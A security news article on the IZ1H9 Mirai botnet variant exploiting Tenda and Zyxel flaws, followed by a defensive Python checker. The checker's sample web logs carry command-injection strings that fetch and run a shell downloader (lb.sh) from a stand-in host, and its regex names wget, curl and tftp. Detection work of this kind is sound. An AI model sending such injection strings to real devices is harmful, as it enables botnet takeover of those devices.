Mirai Variant Can Exploit Tenda and Zyxel Devices for Remote Code Execution and DDoS Attacks

A variant of the infamous Mirai botnet has been discovered that exploits four device vulnerabilities to add Linux-based servers and IoT devices to botnets used for network-based attacks. The IZ1H9 variant was observed by Palo Alto Networks’ Unit 42, which found it being used in an attack on 10 April. The botnet exploits two command injection vulnerabilities, CVE-2023-27076 and CVE-2023-26801, and two remote code execution flaws, CVE-2023-26802 and one without a CVE that affects Zyxel devices. Although the botnet seems focused on distributed denial of service attacks, the vulnerabilities could ultimately lead to remote code execution.
Remote code execution ranks high on the list of outcomes enterprises would rather avoid: vulnerable devices are completely compromised by attackers, often for long periods, and eventually become persistent risks. Unit 42 researchers have observed IZ1H9 being controlled by one threat actor in more than one attack since November 2021, and the malware itself has existed in one form or another since 2018. The attribution to a single actor is supported by the identical malware shell script downloaders used across the incidents.
Researchers observed abnormal traffic to an organization’s threat-hunting system as attackers attempted to download and run a shell script downloader, lb.sh, in an attack on 10 April. If executed, this downloader deploys and executes a range of bot clients built for different Linux architectures. The final step of the attack blocks network connections on several ports, including SSH, telnet and HTTP, by modifying the device’s iptables rules.
Experts stressed that anyone with vulnerable devices in their infrastructure should update them to the latest software to apply any available patches against Mirai variants. Organizations can also protect their networks with advanced firewalls and threat protection that use machine learning to detect vulnerability exploits in real time, together with advanced URL filtering and DNS security to block command-and-control domains and malware-hosting URLs.
Blocking ports 80 (HTTP), 22 (SSH) and 23 (telnet) on public-facing devices should be a no-brainer for mitigating this type of attack. IoT device manufacturers often ship devices with these ports open straight off the assembly line, and an international governing body is needed to hold them responsible.
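As an added example, not from the article or from Unit 42’s report, the following Python checker flags the two stages of the attack chain described above in constructed data: a web log entry whose decoded request fetches a shell script downloader such as lb.sh, and an iptables dump in which the SSH, telnet and HTTP ports have been dropped. The log lines, addresses and rules are constructed samples, and the patterns are assumptions about what such activity looks like, not Unit 42 signatures.

```python
import re
from urllib.parse import unquote_plus
# Stage 1: a request carrying a shell-script downloader fetch (the article names
# lb.sh): wget/curl/tftp followed by an http(s) URL ending in .sh, after decoding.
DOWNLOADER_RE = re.compile(
    r"\b(?:wget|curl|tftp)\b[^\"']{0,200}?(?P<url>https?://\S+?\.sh)\b", re.I)
# Stage 2: INPUT rules that DROP/REJECT the ports the article says the bot
# closes after infection (SSH, telnet, HTTP) to lock other parties out.
LOCKOUT_PORTS = {22: "ssh", 23: "telnet", 80: "http"}
IPTABLES_RULE_RE = re.compile(
    r"^-A INPUT\b.*--dport (?P<port>\d+)\b.*-j (?P<target>DROP|REJECT)")

def find_downloader_fetches(log_lines):
    """Return (line_no, url) for each log line that fetches a .sh script."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = DOWNLOADER_RE.search(unquote_plus(line))
        if m:
            hits.append((n, m.group("url")))
    return hits

def blocked_lockout_ports(iptables_dump):
    """Return lockout ports that an 'iptables -S' dump drops or rejects."""
    found = set()
    for line in iptables_dump:
        m = IPTABLES_RULE_RE.search(line.strip())
        if m and int(m.group("port")) in LOCKOUT_PORTS:
            found.add(int(m.group("port")))
    return sorted(found)

# Constructed sample data (TEST-NET addresses, not real indicators).
SAMPLE_HTTP_LOG = [
    '203.0.113.9 - - [10/Apr/2023:08:12:01 +0000] "GET /cgi-bin/info.cgi?cmd=wget+http://198.51.100.7/lb.sh+-O+/tmp/lb.sh HTTP/1.1" 200 12',
    '203.0.113.9 - - [10/Apr/2023:08:12:03 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.20 - - [10/Apr/2023:08:12:09 +0000] "GET /cgi-bin/status.cgi?cmd=uptime HTTP/1.1" 200 44',
    '203.0.113.9 - - [10/Apr/2023:08:12:15 +0000] "GET /cgi-bin/info.cgi?cmd=cd%20/tmp;%20wget%20http://198.51.100.7/lb.sh;%20sh%20lb.sh HTTP/1.1" 200 12',
]
SAMPLE_IPTABLES = [
    "-A INPUT -p tcp -m tcp --dport 22 -j DROP",
    "-A INPUT -p tcp -m tcp --dport 23 -j DROP",
    "-A INPUT -p tcp -m tcp --dport 80 -j DROP",
    "-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT",
]
if __name__ == "__main__":
    for n, url in find_downloader_fetches(SAMPLE_HTTP_LOG):
        print(f"log line {n}: shell-script downloader fetch from {url}")
    for port in blocked_lockout_ports(SAMPLE_IPTABLES):
        print(f"iptables drops {LOCKOUT_PORTS[port]} (tcp/{port}); compare with baseline")
```

Dropped lockout ports are only suspicious on a device whose baseline configuration does not already close them, so compare the result with the known-good rule set before raising an alert.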
